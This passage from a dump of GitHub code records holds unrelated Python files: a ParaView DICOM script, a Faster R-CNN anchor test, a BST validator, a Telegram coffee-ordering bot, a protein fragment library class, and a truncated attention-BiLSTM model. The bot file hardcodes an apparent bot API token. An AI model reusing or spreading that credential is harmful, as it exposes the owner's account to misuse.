import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# find source\ndICOMReaderdirectory1 = FindSource('DICOMReaderdirectory1')\n\n# create a new 'Threshold'\nthreshold1 = Threshold(Input=dICOMReaderdirectory1)\nthreshold1.Scalars = ['POINTS', 'DICOMImage']\n# show only DOSE\nthreshold1.ThresholdRange = [4000.0, 7622.0]\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n\n# get color transfer function/color map for 'DICOMImage'\ndICOMImageLUT = GetColorTransferFunction('DICOMImage')\n\n# show data in view\nthreshold1Display = Show(threshold1, renderView1)\n# trace defaults for the display properties.\nthreshold1Display.ColorArrayName = ['POINTS', 'DICOMImage']\nthreshold1Display.LookupTable = dICOMImageLUT\nthreshold1Display.OSPRayScaleArray = 'DICOMImage'\nthreshold1Display.OSPRayScaleFunction = 'PiecewiseFunction'\nthreshold1Display.SelectOrientationVectors = 'DICOMImage'\nthreshold1Display.ScaleFactor = 16.62890625\nthreshold1Display.SelectScaleArray = 'DICOMImage'\nthreshold1Display.GlyphType = 'Arrow'\nthreshold1Display.ScalarOpacityUnitDistance = 2.5428906602855523\nthreshold1Display.GaussianRadius = 8.314453125\nthreshold1Display.SetScaleArray = ['POINTS', 'DICOMImage']\nthreshold1Display.ScaleTransferFunction = 'PiecewiseFunction'\nthreshold1Display.OpacityArray = ['POINTS', 'DICOMImage']\nthreshold1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# show color bar/color legend\nthreshold1Display.SetScalarBarVisibility(renderView1, True)\n\n# Rescale transfer function\ndICOMImageLUT.RescaleTransferFunction(-1024.0, 7622.0)\n\n# get opacity transfer function/opacity map for 'DICOMImage'\ndICOMImagePWF = GetOpacityTransferFunction('DICOMImage')\n\n# Rescale transfer function\ndICOMImagePWF.RescaleTransferFunction(-1024.0, 7622.0)\n\n# hide data in view\nHide(dICOMReaderdirectory1, renderView1)\n\n#### saving camera placements for all active views\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [157.96071299530226, 1123.585776382758, -38.74159849936598]\nrenderView1.CameraFocalPoint = [164.677734375, 164.677734375, 92.25]\nrenderView1.CameraViewUp = [-0.11784470609179896, -0.1352151618055555, -0.9837832511605568]\nrenderView1.CameraParallelScale = 250.4946604176746\n\n","repo_name":"antnieszka/DICOM-and-dose-visualization","sub_path":"scripts/pv_tresh.py","file_name":"pv_tresh.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29414559443","text":"import anchor_target_layer\nimport read_pascal_voc\nfrom batchup import data_source\n\nrpn = []\nfeat_stride = 16\nanchor_scale = [8, 16, 32]\nimageNameFile = \"../../../Datasets/VOCdevkit/VOC2012/ImageSets/Main/aeroplane_train.txt\"\nvocPath = \"../../../Datasets/VOCdevkit/VOC2012\"\n\nImage_data, boundingBX_labels, im_dims = read_pascal_voc.prepareBatch(0, 5, imageNameFile, vocPath)\nprint(Image_data, boundingBX_labels, im_dims)\n\nepochs = 1\nfor loop in range(epochs):\n\n # ______________________________________________________________________\n # my batch creater\n # Construct an array data source\n ds = data_source.ArrayDataSource([Image_data, boundingBX_labels, im_dims])\n # Iterate over samples, drawing batches of 64 elements in random order\n for (image_input, gt_box, image_dim) in ds.batch_iterator(batch_size=1,\n shuffle=True): # shuffle true will randomise every batch\n # accuoutput=sess.run([rpn], feed_dict={input_x: image_input, gt_bbox: gt_box, im_dimsal: image_dim})\n _label, rpn_bbox_targets, rpn_bbox_inside_weights, rpn_bbox_outside_weights = anchor_target_layer.anchor_target_layer_python(\n rpn_cls_score=image_input, gt_boxes=gt_box, im_dims=image_dim, feat_strides=feat_stride,\n anchor_scales=anchor_scale)\n\n# (rpn_label)\n","repo_name":"mayanks888/AI","sub_path":"Deep learning/TensorFlow/object_detection_layers/modified_version/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29375793707","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def isValidBST(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n\n def _valid(root):\n min_left = root.val\n if root.left:\n min_left, max_left, valid = _valid(root.left)\n if not valid or max_left >= root.val:\n return 0, 0, False\n max_right = root.val\n if root.right:\n min_right, max_right, valid = _valid(root.right)\n if not valid or root.val >= min_right:\n return 0, 0, False\n return min(min_left, root.val), max(max_right, root.val), True\n\n if root:\n _, _, valid = _valid(root)\n return valid\n return True\n\n\n","repo_name":"wangqi1996/leetcode","sub_path":"validate-binary-search-tree.py","file_name":"validate-binary-search-tree.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8537829756","text":"import json\nimport time\nimport urllib\nimport requests\nimport dborder\nimport dbmenu\nfrom datetime import datetime\n\n\ndb1 = dborder.DBOrder()\ndb2 = dbmenu.DBMenu()\n\nTOKEN = \"394797326:AAENj4pBxD86utZ4okjd_23Iy3_uQ8KeTOo\"\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\norder = []\n\n\ndef handle_updates(updates):\n for update in updates[\"result\"]:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n menu_items = db2.get_items()\n if text == \"/menu\":\n message = \"\\n\".join(menu_items)\n send_message(message, chat)\n elif text == \"/order\":\n keyboard = build_menu_keyboard(menu_items)\n send_message(\"Что вы пьете сегодня?\", chat, keyboard)\n elif text == \"/cancel\":\n db1.delete_item(text)\n send_message(\"Надеемся увидится снова!\", chat)\n\n elif text == \"/start\":\n send_message(\n \"Good MO! Мы рады, что ты зашел к нам! Если хочешь посмотерть меню, отправь /menu. \"\n \"Если уже знаешь, что хочешь заказать, отправь /order. \"\n \"Для отмены отправь /cancel.\",\n chat)\n elif text.startswith(\"/\"):\n continue\n else:\n if text in menu_items:\n message = 'Ваш заказ: ' + text\n date = datetime.now()\n order.append(text)\n order.append(date)\n send_message(message, chat)\n send_message(\"Введите свое имя и время, в которое заберете свой заказ. ФОРМАТ ЗАПИСИ: Мария 10:30\", chat)\n else:\n try:\n order.append(text)\n body = str(order[0])\n person = str(order[2])\n created = str(order[1])\n tables_id = 1\n db1.add_item(tables_id, body, person, created,)\n send_message(\"Спасибо за заказ! Мы очень вас ждем!\", chat)\n order.clear()\n except:\n send_message(\"Некорректно введены данные, повторите ввод\", chat)\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return (text, chat_id)\n\n\ndef build_menu_keyboard(menu_items):\n menu_keyboard = [[item] for item in menu_items]\n reply_markup = {\"keyboard\": menu_keyboard, \"one_time_keyboard\": True}\n return json.dumps(reply_markup)\n\n\ndef build_keyboard(items):\n keyboard = [[item] for item in items]\n reply_markup = {\"keyboard\": keyboard, \"one_time_keyboard\": True}\n return json.dumps(reply_markup)\n\n\ndef send_message(text, chat_id, reply_markup=None):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}&parse_mode=Markdown\".format(text, chat_id)\n if reply_markup:\n url += \"&reply_markup={}\".format(reply_markup)\n get_url(url)\n\n\ndef main():\n # db1.setup()\n last_update_id = None\n while True:\n updates = get_updates(last_update_id)\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n handle_updates(updates)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"savinkova-mariia/coffee_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33900067115","text":"import os\nimport gemmi\nimport conkit.io\nimport itertools\nimport pandas as pd\nimport swamp.utils as utils\nfrom swamp.wrappers import Gesamt\nfrom swamp.parsers import PdbtmXmlParser\nfrom swamp.logger import SwampLogger\n\n\nclass SwampLibrary(object):\n \"\"\"Class that implements certain methods to create a SWAMP fragment library and data structures to manage the data\n of interest in the library.\n\n :param str workdir: the working directory for this instance. Only used if a library will be created.\n :param `~swamp.logger.swamplogger.SwampLogger` logger: logging instance\n :ivar `pandas.DataFrame` rmsd_matrix: square dataframe with the rmsd distance across framgents in the library\n :ivar `pandas.DataFrame` qscore_matrix: square dataframe with the similarity across framgents in the library\n :ivar `pandas.DataFrame` nalign_matrix: square dataframe with the no. of aligned residues between framgents in the \\\n library\n :ivar str pdb_library: location of the directory with the pdb files contained in the SWAMP library\n :ivar str pdbtm_svn: location of the pdbtm svn repository\n :ivar str outdir: an output directory for any operation of the :py:obj:`~swamp.utils.swamplibrary.SwampLibrary` \\\n instance\n\n :example:\n\n >>> from swamp.utils.swamplibrary import SwampLibrary\n >>> my_library = SwampLibrary('<workdir>')\n >>> pdb_code_list = my_library.parse_nr_listfile(\"/path/to/nr_list\")\n >>> my_library.pdbtm_svn = \"/path/to/pdbtm_svn\"\n >>> my_library.pdb_library = \"/path.to/pdb_library\"\n >>> my_library.make_library(outdir=\"/path/to/outdir\", pdb_codes=pdb_code_list)\n >>> my_library.all_vs_all_gesamt(outdir=\"/path/to/outdir\", inputdir=\"/path/to/library\", nthreads=1)\n >>> my_library.create_distance_mtx(gesamt_dir=\"/path/to/gesamt_dir\")\n\n \"\"\"\n\n def __init__(self, workdir, logger=None):\n self.workdir = workdir\n self._make_workdir()\n if logger is None:\n self.logger = SwampLogger(__name__)\n self.logger.init(logfile=None, use_console=True, console_level='info')\n else:\n self.logger = logger\n self.qscore_matrix = None\n self.nalign_matrix = None\n self.rmsd_matrix = None\n self.pdb_library = None\n self.pdbtm_svn = None\n self.outdir = None\n\n # ------------------ Properties ------------------\n\n @property\n def pdbfiles_list(self):\n \"\"\"A list of file names in :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.pdb_library`\"\"\"\n return [os.path.join(self.pdb_library, fname) for fname in os.listdir(self.pdb_library)]\n\n @property\n def _pdbfname_template(self):\n \"\"\"A template file name for pdb files\"\"\"\n return os.path.join(self.pdb_library, \"{}\", \"pdb{}.ent.gz\")\n\n @property\n def _xmlfname_template(self):\n \"\"\"A template file name for xml files\"\"\"\n return os.path.join(self.pdbtm_svn, \"{}\", \"{}.xml\")\n\n @property\n def _fragfile_template(self):\n \"\"\"A template file name for fragment pdb files\"\"\"\n return os.path.join(self.pdb_library, '{}.pdb')\n\n @property\n def _library_out_template(self):\n \"\"\"A template file name for pdb files with helical pairs\"\"\"\n return os.path.join(self.workdir, '{}_{}{}_{}{}.{}')\n\n @property\n def _ensemble_pdbout_template(self):\n \"\"\"A template pdb file name for ensemble output files\"\"\"\n if self.outdir is None:\n return None\n else:\n return os.path.join(self.outdir, 'ensemble_{}.pdb')\n\n @property\n def _centroid_template(self):\n \"\"\"A centroid pdb file name template\"\"\"\n if self.outdir is None:\n return None\n else:\n return os.path.join(self.outdir, 'centroid_{}.pdb')\n\n # ------------------ Hidden methods ------------------\n\n def _is_valid_entry(self, pdbcode):\n \"\"\"For a given pdb code, check if there is a PDB and a XML file in the \\\n :py:attr:`~swamp.utils.swamplibrary.pdb_library` and :py:attr:`~swamp.utils.swamplibrary.pdbtm_svn` respectively\n\n :param str pdbcode: the pdb code of interest\n :returns: True if all the files are present (bool)\n \"\"\"\n\n if not os.path.isfile(self._pdbfname_template.format(pdbcode[1:3], pdbcode)):\n self.logger.warning(\"Entry %s not found in input dir %s\" % (pdbcode, self.pdb_library))\n return False\n if not os.path.isfile(self._xmlfname_template.format(pdbcode[1:3], pdbcode)):\n self.logger.warning(\"Entry %s not found in input dir %s\" % (pdbcode, self.pdbtm_svn))\n return False\n return True\n\n def _make_workdir(self):\n \"\"\"Create the :py:attr:`~swamp.utils.swamplibrary.workdir`\n\n :raises ValueError: if :py:attr:`~swamp.utils.swamplibrary.workdir` is None\n \"\"\"\n\n if self.workdir is None:\n raise ValueError(\"Impossible to create workdir, please set workdir value first!\")\n\n if not os.path.isdir(self.workdir):\n os.mkdir(self.workdir)\n\n def _determine_orientation(self, frag_ids):\n \"\"\"For a given set of fragment ids, determine the optimal orientation to ensemble them and return the tuple of \\\n file names\n\n :param frag_ids: a list with the fragment ids of interest\n :type frag_ids: list, tuple\n :returns: a tuple with the file names of the alignment that scored the highest qscore (tuple)\n :raises ValueError: if there are less than 2 fragments in the input list\n \"\"\"\n\n if len(frag_ids) < 2:\n raise ValueError(\"Impossible to determine the orientation of less than two fragments!\")\n\n qscores = []\n frag_list = [(frag, SwampLibrary._get_reciprocal_id(frag)) for frag in frag_ids]\n\n all_combinations = list(itertools.product(*frag_list))\n\n for combination in all_combinations:\n gesamt = Gesamt(pdbin=[self._fragfile_template.format(x) for x in combination], workdir=None,\n mode=\"alignment\")\n gesamt.run()\n qscores.append(float(gesamt.summary_results[\"qscore\"]))\n\n return all_combinations[qscores.index(max(qscores))]\n\n # ------------------ Public methods ------------------\n\n def remove_homologs(self, pdb_ids_to_remove):\n \"\"\"Remove fragments originating from a set of pdb structures out of \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.qscore_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.rmsd_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.nalign_matrix`\n\n :argument tuple pdb_ids_to_remove: tuple with the pdb codes of the structures to be removed\n \"\"\"\n\n # Detect the fragments comming from homolog structures (convert everything to lower case)\n pdb_ids_to_remove = [pdb.lower() for pdb in pdb_ids_to_remove]\n frag_ids_to_remove = []\n for frag_id in self.qscore_matrix.columns:\n if frag_id.split('_')[0].lower() in pdb_ids_to_remove:\n frag_ids_to_remove.append(frag_id)\n # Remove the fragments\n self.qscore_matrix.drop(frag_ids_to_remove, 0, inplace=True)\n self.qscore_matrix.drop(frag_ids_to_remove, 1, inplace=True)\n self.rmsd_matrix.drop(frag_ids_to_remove, 0, inplace=True)\n self.rmsd_matrix.drop(frag_ids_to_remove, 1, inplace=True)\n self.nalign_matrix.drop(frag_ids_to_remove, 0, inplace=True)\n self.nalign_matrix.drop(frag_ids_to_remove, 1, inplace=True)\n\n def create_distance_mtx(self, gesamt_dir):\n \"\"\"Create the square distance matrices for the library: \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.qscore_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.rmsd_matrix` and \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.nalign_matrix`\n\n Requires the :py:func:`~swamp.utils.swamplibrary.SwampLibrary.all_vs_all_gesamt` results. The distance \\\n matrices contain the optimal structural alignment between every set of fragments present in the library.\n\n :param str gesamt_dir: directory containing the .hit files resulting from the all vs all gesamt search results\n \"\"\"\n\n frag_dict = self._get_frag_id_dict(gesamt_dir)\n self.qscore_matrix = pd.DataFrame()\n self.qscore_matrix[\"frag_id\"] = list(frag_dict.keys())\n self.rmsd_matrix = pd.DataFrame()\n self.rmsd_matrix[\"frag_id\"] = list(frag_dict.keys())\n self.nalign_matrix = pd.DataFrame()\n self.nalign_matrix[\"frag_id\"] = list(frag_dict.keys())\n self.logger.info(\"Creating distance matrices now...\")\n n_frags = len(frag_dict.keys())\n\n for idx, unique_id in enumerate(frag_dict.keys()):\n self.logger.info(\"Working on entry %s (%s/%s)\" % (unique_id, idx + 1, n_frags))\n fragment_distances = None\n\n for hitfile in frag_dict[unique_id]:\n # Get the current distances\n current_hits = Gesamt.parse_hitfile(hitfile)\n current_hits.drop(\"n_res\", 1, inplace=True)\n current_hits.drop(\"seq_id\", 1, inplace=True)\n current_hits.drop(\"rmsd\", 1, inplace=True)\n current_hits.fname = current_hits.fname.str.replace('.pdb', '')\n current_hits.rename(columns={\"fname\": \"frag_id\"}, inplace=True)\n current_hits.frag_id = current_hits.frag_id.apply(lambda x: self._get_unique_frag_id(x))\n current_hits[\"max_qscore\"] = current_hits.groupby([\"frag_id\"], sort=False)[\"qscore\"].transform(max)\n current_hits = current_hits[current_hits.qscore == current_hits.max_qscore]\n current_hits.drop(\"qscore\", 1, inplace=True)\n current_hits.drop_duplicates(inplace=True)\n # Append results to the current fragment distances\n fragment_distances = pd.concat([fragment_distances, current_hits]).reset_index(drop=True)\n\n # Get the final distances for this fragment\n fragment_distances.rename(columns={'max_qscore': 'qscore'}, inplace=True)\n fragment_distances['max_qscore'] = fragment_distances.groupby([\"frag_id\"], sort=False)[\"qscore\"].transform(\n max)\n fragment_distances = fragment_distances[fragment_distances.qscore == fragment_distances.max_qscore]\n fragment_distances.drop(\"max_qscore\", 1, inplace=True)\n fragment_distances.drop_duplicates(subset='frag_id', inplace=True)\n # Store it in the final matrix\n self.qscore_matrix = self.qscore_matrix.merge(fragment_distances.loc[:, ['frag_id', 'qscore']], how=\"left\",\n on=[\"frag_id\"])\n self.qscore_matrix.rename(columns={'qscore': unique_id}, inplace=True)\n self.nalign_matrix = self.nalign_matrix.merge(fragment_distances.loc[:, ['frag_id', 'n_align']], how=\"left\",\n on=[\"frag_id\"])\n self.nalign_matrix.rename(columns={'n_align': unique_id}, inplace=True)\n self.rmsd_matrix = self.rmsd_matrix.merge(fragment_distances.loc[:, ['frag_id', 'rmsd']], how=\"left\",\n on=[\"frag_id\"])\n self.rmsd_matrix.rename(columns={'rmsd': unique_id}, inplace=True)\n\n self.rmsd_matrix = self.rename_axis(self.rmsd_matrix)\n self.nalign_matrix = self.rename_axis(self.nalign_matrix)\n self.qscore_matrix = self.rename_axis(self.qscore_matrix)\n\n def make_library(self, pdb_codes):\n \"\"\"Create the pdb files for each contacting TM helical pair in detected with the information at \\\n :py:attr:`~swamp.utils.swamplibrary.pdb_library` and :py:attr:`~swamp.utils.swamplibrary.pdbtm_svn`. Files \\\n will be created at :py:attr:`~swamp.utils.swamplibrary.workdir`\n\n :param list pdb_codes: a list with the pdb codes that will be included to the library\n \"\"\"\n\n for idx, entry in enumerate(pdb_codes):\n\n pdbcode = entry[0]\n chain = entry[1]\n if not self._is_valid_entry(pdbcode):\n self.logger.warning(\"Skipping invalid entry %s\" % pdbcode)\n continue\n self.logger.info(\n \"Processing %s:%s entry to the library (%s / %s)\" % (pdbcode, chain, idx + 1, len(pdb_codes)))\n\n # TM helices\n pdbtm_parser = PdbtmXmlParser(self._xmlfname_template.format(pdbcode[1:3], pdbcode))\n pdbtm_parser.parse()\n tmhelices = [ss_annot for ss_annot in pdbtm_parser.ss2_annotation if\n ss_annot.type == \"H\" and ss_annot.chain == chain]\n\n # Extract pdb hierarchy\n full_hierarchy = gemmi.read_structure(self._pdbfname_template.format(pdbcode[1:3], pdbcode))\n if full_hierarchy.info.__getitem__('_exptl.method') != 'X-RAY DIFFRACTION':\n self.logger.info('Not a X-ray structure, skipping...')\n continue\n full_hierarchy.remove_waters()\n\n # Check helical pairs individually\n for idx, helix_a in enumerate(tmhelices):\n for helix_b in tmhelices[idx + 1:]:\n\n helix_a_hierarchy = utils.extract_hierarchy(to_extract=helix_a.pdb_region,\n chainID=helix_a.chain,\n full_hierarchy=full_hierarchy)\n helix_b_hierarchy = utils.extract_hierarchy(to_extract=helix_b.pdb_region,\n chainID=helix_b.chain,\n full_hierarchy=full_hierarchy)\n fragment_hierarchy = utils.merge_hierarchies((helix_a_hierarchy, helix_b_hierarchy),\n renumber=False)\n fragment_cmap = utils.extract_fragment_cmap(fragment_hierarchy,\n (helix_a.pdb_region, helix_b.pdb_region))\n\n if fragment_cmap is None:\n self.logger.warning(\n \"No contacts loaded from %s:%s %s - %s\" % (pdbcode, chain, helix_a.index, helix_b.index))\n continue\n\n if len(fragment_cmap) >= 2:\n self.logger.info(\n \"Found contacting helical pair! %s %s %s\" % (pdbcode, helix_a.index, helix_b.index))\n\n # Write pdb files\n fragment_hierarchy.cell = full_hierarchy.cell\n utils.renumber_hierarchy(fragment_hierarchy)\n inverted_fragment = utils.invert_hiearchy(fragment_hierarchy)\n inverted_fragment.cell = full_hierarchy.cell\n pdbout = self._library_out_template.format(pdbcode, helix_a.index, helix_a.chain, helix_b.index,\n helix_b.chain, \"pdb\")\n fragment_hierarchy.write_pdb(pdbout)\n pdbout = self._library_out_template.format(pdbcode, helix_b.index, helix_b.chain, helix_a.index,\n helix_a.chain, \"pdb\")\n inverted_fragment.write_pdb(pdbout)\n\n # Write contact maps\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_a.index, helix_a.chain, helix_b.index,\n helix_b.chain, \"mapalign\"), \"mapalign\", fragment_cmap)\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_a.index, helix_a.chain, helix_b.index,\n helix_b.chain, \"aleigen\"), \"aleigen\", fragment_cmap)\n inverted_cmap = utils.invert_contactmap(fragment_cmap)\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_b.index, helix_b.chain, helix_a.index,\n helix_a.chain, \"mapalign\"), \"mapalign\", inverted_cmap)\n conkit.io.write(\n self._library_out_template.format(pdbcode, helix_b.index, helix_b.chain, helix_a.index,\n helix_a.chain, \"aleigen\"), \"aleigen\", inverted_cmap)\n\n def all_vs_all_gesamt(self, inputdir, outdir, nthreads=1):\n \"\"\"For each the members of the library, obtain the distance with all the others. This step is required to \\\n obtain the distance matrices: :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.qscore_matrix`, \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.rmsd_matrix` and \\\n :py:attr:`~swamp.utils.swamplibrary.SwampLibrary.nalign_matrix`\n\n :param str inputdir: the input directory with the pdb files created by \\\n :py:func:`~swamp.utils.swamplibrary.SwampLibrary.make_library`\n :param str outdir: the output directory where the .hit files will be created\n :param int nthreads: number of threads to be used in the gesamt archive scan (default 1)\n \"\"\"\n\n # Make the archive\n self.logger.info(\"Creating gesamt archive at %s\" % os.path.join(outdir, \"gesamt_archive\"))\n gesamt_makearchive = Gesamt(workdir=None, mode=\"make-archive\", pdb_archive=inputdir, pdbin=None,\n gesamt_archive=os.path.join(outdir, \"gesamt_archive\"))\n gesamt_makearchive.run()\n\n # Scan the archive with all the fragments in the library\n self.logger.info(\"Now scanning archive with all fragments in the library...\")\n fragment_list = [os.path.join(inputdir, fname) for fname in os.listdir(inputdir) if\n fname[-4:] == \".pdb\" and os.path.isfile(os.path.join(inputdir, fname))]\n for pdbfile in fragment_list:\n id = os.path.basename(pdbfile)[:-4]\n gesamt = Gesamt(mode=\"search-archive\", pdbin=pdbfile, gesamt_archive=os.path.join(outdir, \"gesamt_archive\"),\n min2=\"0\", nthreads=str(nthreads), min1=\"0\", workdir=None,\n hits_out=os.path.join(outdir, \"%s_hits.txt\" % id))\n gesamt.run()\n\n # ------------------ Static methods ------------------\n\n @staticmethod\n def rename_axis(df):\n \"\"\"Rename the axis of a `pandas.DataFrame` so that the row names correspond with the column names\n\n :param `pandas.DataFrame` df: the dataframe to be renamed\n :returns: renamed dataframe (`pandas.DataFrame`)\n \"\"\"\n\n new_rownames = {}\n for rowidx in [x for x in list(df.index)]:\n new_rownames[rowidx] = df.columns[rowidx + 1]\n\n df = df.rename(index=new_rownames, inplace=False)\n return df.drop(\"frag_id\", 1)\n\n @staticmethod\n def _get_unique_frag_id(frag_id):\n \"\"\"For a given fragment id (pdb_tmhelix_tmhelix) obtain the unique fragment id (tmhelix fields are sorted)\n\n The unique id corresponds with the pdb code of the structure where the fragment was found, plus the sorted\n indeces of the two TM helices that form the fragment. This fragment id serves as an unique pointer for each\n component of the library.\n\n :param str frag_id: the fragment id of interest\n :returns: unique fragment id (str)\n :raises ValueError: if the fragment id has more than 3 components\n \"\"\"\n\n frag_id = frag_id.split(\"_\")\n if len(frag_id) > 3:\n raise ValueError(\"The frag ID cannot have more than 3 components! %s\" % \"_\".join(frag_id))\n frag_id[1:] = sorted(frag_id[1:])\n return \"_\".join(frag_id)\n\n @staticmethod\n def _get_reciprocal_id(frag_id):\n \"\"\"Method to get the reciprocal fragment id.\n\n A reciprocal fragment corresponds with the same fragment id, but the order at which the TM helices appear\n at the sequence the fragment has been inverted.\n\n :param str frag_id: fragment id of interest\n :returns: reciprocal id where the helical order is inverted (str)\n \"\"\"\n\n frag_id = frag_id.split(\"_\")\n if len(frag_id) > 3:\n raise ValueError(\"The frag ID cannot have more than 3 components! %s\" % \"_\".join(frag_id))\n frag_id[1:] = reversed(frag_id[1:])\n return \"_\".join(frag_id)\n\n @staticmethod\n def _get_frag_id_dict(gesamt_dir):\n \"\"\"In a directory full of gesamt .hit files, parse all the fragment ids and their hit files into a dictionary\n\n It will compute both orientations into a dictionary where the key is the unique frag id\n\n :param str gesamt_dir: directory where the .hit files are located\n :returns: a dictionary with the unique fragment id as key and a list with the hit filenames as values\n \"\"\"\n\n result = {}\n\n for hitfile in os.listdir(gesamt_dir):\n hitfile = os.path.join(gesamt_dir, hitfile)\n if not os.path.isfile(hitfile) or not os.path.basename(hitfile)[-4:] == \".txt\":\n continue\n frag_id = os.path.basename(hitfile)[:-9]\n unique_id = SwampLibrary._get_unique_frag_id(frag_id)\n if unique_id in result.keys():\n result[unique_id].append(hitfile)\n else:\n result[unique_id] = [hitfile]\n\n return result\n\n @staticmethod\n def parse_nr_listfile(fname):\n \"\"\"Method to parse a file with pdb structures listed as PDB:CHAIN into a nested list\n\n :param str fname: file name with the list to be parsed\n :returns: a nested list where each element contains the non-redundant pdb code and chain name (list)\n \"\"\"\n\n nr_pdbIDsChains = []\n with open(fname, \"r\") as nr_list_file:\n for line in nr_list_file:\n nr_pdbIDsChains.append((line[:4], line.rstrip()[-1]))\n return nr_pdbIDsChains\n","repo_name":"rigdenlab/SWAMP","sub_path":"swamp/utils/swamplibrary.py","file_name":"swamplibrary.py","file_ext":"py","file_size_in_byte":22275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15748167770","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# set random seed for consistent predict result\nfrom numpy.random import seed\nseed(2018)\nfrom tensorflow import set_random_seed\nset_random_seed(2018)\n\n\n\nimport tensorflow as tf\nfrom tensorflow.contrib.rnn import BasicLSTMCell\nfrom tensorflow.python.ops.rnn import bidirectional_dynamic_rnn as bi_rnn\n\n\n\n\nclass TAblstmConfig(object):\n \"\"\"配置参数\"\"\"\n learning_rate = 1e-3 # 学习率\n dropout_keep_prob = 0.5 # dropout保留比例\n batch_size = 20 # 每批训练大小 256\n\n embedding_dim = 300 # 词向量维度\n seq_length = 25 # 序列长度\n num_classes = 3 # 类别数 3008\n hidden_dim = 512 # 隐藏层神经元\n epsilon = 7.5\n\n vocab_size = 20000 # 词汇表达小\n voc_freq=[]\n\n num_epochs = 3 # 总迭代轮次\n\n print_per_batch = 100 # 每多少轮输出一次结果\n save_per_batch = 10 # 每多少轮存入tensorboard\n\n topk = 3 #预测前topk\n\n\ndef attention(inputs, attention_size, time_major=False, return_alphas=False):\n \"\"\"\n Attention mechanism layer which reduces RNN/Bi-RNN outputs with Attention vector.\n The idea was proposed in the article by Z. Yang et al., \"Hierarchical Attention Networks\n for Document Classification\", 2016: http://www.aclweb.org/anthology/N16-1174.\n Variables notation is also inherited from the article\n\n \"\"\"\n\n if isinstance(inputs, tuple):\n # In case of Bi-RNN, concatenate the forward and the backward RNN outputs.\n inputs = tf.concat(inputs, 2)\n\n if time_major:\n # (T,B,D) => (B,T,D)\n inputs = tf.array_ops.transpose(inputs, [1, 0, 2])\n\n hidden_size = inputs.shape[2].value # D value - hidden size of the RNN layer\n\n # Trainable parameters\n w_omega = tf.Variable(tf.random_normal([hidden_size, attention_size], stddev=0.1))\n b_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))\n u_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))\n\n with tf.name_scope('v'):\n # Applying fully connected layer with non-linear activation to each of the B*T timestamps;\n # the shape of `v` is (B,T,D)*(D,A)=(B,T,A), where A=attention_size\n v = tf.tanh(tf.tensordot(inputs, w_omega, axes=1) + b_omega)\n\n # For each of the timestamps its vector of size A from `v` is reduced with `u` vector\n vu = tf.tensordot(v, u_omega, axes=1, name='vu') # (B,T) shape\n alphas = tf.nn.softmax(vu, name='alphas') # (B,T) shape\n\n # Output of (Bi-)RNN is reduced with attention vector; the result has (B,D) shape\n output = tf.reduce_sum(inputs * tf.expand_dims(alphas, -1), 1)\n\n if not return_alphas:\n return output\n else:\n return output, alphas\n\ndef _scale_l2(x, norm_length):\n alpha = tf.reduce_max(tf.abs(x), (1, 2), keep_dims=True) + 1e-12\n l2_norm = alpha * tf.sqrt(\n tf.reduce_sum(tf.pow(x / alpha, 2), (1, 2), keep_dims=True) + 1e-6)\n x_unit = x / l2_norm\n return norm_length * x_unit\n\n\ndef add_perturbation(embedded, loss, epsilon):\n \"\"\"Adds gradient to embedding and recomputes classification loss.\"\"\"\n grad, = tf.gradients(\n loss,\n embedded,\n 